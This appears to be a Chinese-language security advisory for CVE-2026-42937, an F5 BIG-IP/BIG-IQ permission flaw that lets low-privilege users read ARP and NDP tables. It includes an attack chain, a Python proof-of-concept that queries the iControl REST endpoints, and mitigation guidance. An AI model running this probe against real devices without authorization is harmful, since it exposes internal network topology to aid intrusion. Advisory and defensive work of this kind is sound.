CVE-2026-42937 F5 BIG-IP权限分配错误导致信息泄露

漏洞信息

漏洞编号

CVE-2026-42937

漏洞类型

权限管理错误

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP, F5 BIG-IQ

漏洞概述

F5 BIG-IP和BIG-IQ产品中存在严重的权限分配错误漏洞。该漏洞影响了TMOS Shell (tmsh)中的arp和ndp命令，以及BIG-IP的iControl REST接口。由于系统未对低权限用户的敏感操作进行有效限制，经过身份验证的攻击者可以利用这些漏洞查看相邻网络的信息。这可能导致敏感的网络拓扑信息泄露，攻击者可以借此获取局域网内的设备存在情况及IP-MAC映射关系，为后续的横向移动或针对性攻击提供便利。

技术细节

该漏洞的根本原因在于F5 BIG-IP和BIG-IQ系统中对于特定系统命令和REST接口的访问控制列表（ACL）配置不当，属于CWE-266（权限分配不当）。具体而言，TMOS Shell (tmsh)是F5设备的高级管理界面，其中的`arp`命令用于查看IPv4地址解析表，`ndp`命令用于查看IPv6邻居发现表。正常情况下，低权限用户不应具备查看这些敏感网络接口信息的能力，因为这有助于探测网络拓扑。

然而，由于权限分配逻辑的缺陷，拥有低权限（PR:L）的认证用户可以通过tmsh执行这些命令，或者通过iControl REST API调用相关端点。攻击过程不需要用户交互（UI:N）且攻击路径复杂度低（AC:L）。攻击者只需拥有合法的设备登录凭据，即可发送特定的REST请求或在tmsh中输入特定命令，系统便会返回本应受限的ARP表项或邻居缓存信息。虽然这不会直接影响系统的完整性或可用性，但高机密性影响（C:H）意味着攻击者可以精确掌握网络内其他活动主机和设备的IP-MAC对应关系，从而破坏网络隐蔽性，辅助定位关键资产。

攻击链分析

STEP 1

1. 获取低权限账号

攻击者通过钓鱼、弱口令猜测或利用其他漏洞获取F5设备的一个低权限用户账号（具备tmsh或REST访问权限）。

STEP 2

2. 构造探测请求

攻击者利用该账号凭证，通过iControl REST接口向/mgmt/tm/net/arp或/mgmt/tm/net/ndp端点发送GET请求，或在tmsh中执行arp/ndp命令。

STEP 3

3. 泄露网络拓扑

系统因权限校验缺失返回了详细的ARP表或邻居发现表数据，攻击者解析这些数据获取内网活跃主机IP及MAC地址，完成信息收集。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json
import urllib3

# Suppress SSL warnings for demonstration
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# CVE-2026-42937 PoC: Information Disclosure via iControl REST
# Target: F5 BIG-IP / BIG-IQ
# Note: Requires valid authentication credentials (low privilege)

def check_cve(target_ip, username, password):
    # iControl REST endpoint for ARP or NDP
    # Attacker tries to access network neighbor info which should be restricted
    endpoints = [
        f"https://{target_ip}/mgmt/tm/net/arp",
        f"https://{target_ip}/mgmt/tm/net/ndp"
    ]

    headers = {
        "Content-Type": "application/json"
    }

    for endpoint in endpoints:
        try:
            print(f"[*] Testing endpoint: {endpoint}")
            response = requests.get(
                endpoint,
                auth=(username, password),
                headers=headers,
                verify=False,
                timeout=10
            )

            if response.status_code == 200:
                data = response.json()
                if "items" in data and len(data["items"]) > 0:
                    print(f"[+] Vulnerable! Successfully retrieved neighbor information.")
                    print(f"[+] Data sample: {json.dumps(data['items'][:2], indent=2)}")
                    return True
            else:
                print(f"[-] Status Code: {response.status_code}")
        except Exception as e:
            print(f"[-] Error connecting to {endpoint}: {e}")
    
    return False

if __name__ == "__main__":
    # Replace with actual target details
    target = "192.168.1.100"
    user = "test_user"
    pwd = "test_pass"
    
    check_cve(target, user, pwd)

影响范围

F5 BIG-IP (具体受影响版本请参考官方公告K000161018)

F5 BIG-IQ (具体受影响版本请参考官方公告K000161018)

防御指南

临时缓解措施

在无法立即安装补丁的情况下，建议管理员通过严格的网络访问控制列表（ACL）限制对iControl REST服务（通常为TCP 443端口）的访问，仅允许可信的管理IP连接。同时，应审查并收回非必要用户的tmshell访问权限，确保最小权限原则的落实，防止低权限账户被滥用进行信息探测。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-42937
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-42937
3 Details https://www.cvedetails.com/cve/CVE-2026-42937/
4 VulDB https://vuldb.com/cve/CVE-2026-42937
5 Link https://my.f5.com/manage/s/article/K000161018